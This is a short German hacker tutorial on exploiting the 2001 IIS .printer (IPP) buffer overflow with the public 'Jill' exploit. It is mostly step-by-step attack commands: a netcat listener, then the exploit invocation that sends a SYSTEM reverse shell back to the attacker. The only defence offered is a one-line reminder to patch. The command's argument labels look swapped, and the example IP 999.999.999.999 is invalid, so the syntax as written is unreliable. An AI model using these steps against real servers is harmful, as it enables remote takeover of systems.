Buffer-Overflow in IIS Servern 

Tools:
-NetCat


-Briefing:

Im Mai 2001 hat eEye Digital Security einen Pufferüberlauf in der ISAPI-Erweiterung,
die .printer-Dateien verarbeitet, um Win2000 für das IPP (Internet Printing Protocol) bereitzustellen.
IPP ermöglicht die Web-basierte Steuerung für Drucker in einem Netzwerk.

beavuh.org hat einen Angriff namens Jill veröffentlicht. Dieser Exploit ist in Unix-C
geschrieben. Kurz danach ist auch schon die Windows-Version erschienen, die jill-win32.exe.


-Angriff:

Die Kommandos werden in der Windows-Eingabeaufforderung eingegeben.



1.Starten eines NetCat-Listeners auf dem Angreifer-System.
  --> nc -vv -l -p 3000
  Ausgabe: listening on [any] 3000 ...

  Dabei kann der Port frei gewählt werden.


2.Ausführen von Jill / jill-win32 mit dem Listener des Angreifers als Ziel.
  --> jill %IP des Angreifers% 80 (port) %IP des Opfers% 3000 (Port des Listeners)
  Beispiel: jill 222.222.222.222 80 999.999.999.999 3000


Wenn alles geklappt hat, wid eine Remote-Shell an den Listener des Angreifers zurückgesandt.
Der Befehl whoami beweist dann, dass man als SYSTEM autorisiert ist.


-Schutzmassnahmen:

Wie immer: Die neusten Patches installieren...



Ende meiner ersten Doku :P

Autor: mr. ultimatrix